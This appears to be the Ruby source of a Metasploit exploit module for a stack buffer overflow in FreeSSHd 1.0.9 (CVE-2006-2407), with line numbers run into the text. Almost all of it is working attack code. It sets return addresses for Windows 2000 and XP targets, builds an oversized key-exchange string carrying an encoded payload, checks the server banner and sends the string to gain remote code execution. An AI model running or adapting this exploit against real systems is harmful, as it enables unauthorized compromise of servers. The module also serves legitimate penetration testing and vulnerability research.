Path: blob/master/modules/exploits/windows/ssh/freesshd_key_exchange.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',15'Description' => %q{16This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.17This flaw is due to a buffer overflow error when handling a specially18crafted key exchange algorithm string received from an SSH client.19},20'Author' => 'MC',21'License' => MSF_LICENSE,22'References' => [23['CVE', '2006-2407'],24['OSVDB', '25463'],25['BID', '17958'],26],27'DefaultOptions' => {28'EXITFUNC' => 'process',29},30'Payload' => {31'Space' => 500,32'BadChars' => "\x00",33'StackAdjustment' => -3500,34},35'Platform' => 'win',36'Targets' => [37[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ],38[ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e51877 } ],39[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ],40],41'Privileged' => true,42'DisclosureDate' => '2006-05-12',43'DefaultTarget' => 0,44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options(53[54Opt::RPORT(22)55]56)57end5859def exploit60connect6162sploit = "SSH-2.0-OpenSSH_3.9p1"63sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"64sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"65sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')66sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"6768res = sock.recv(22)69if (res =~ /SSH-2.0-WeOnlyDo 1.2.7/)70print_status("Trying target #{target.name}...")71sock.put(sploit)72else73print_status("Not running a vulnerable version...")74end7576handler77disconnect78end79end808182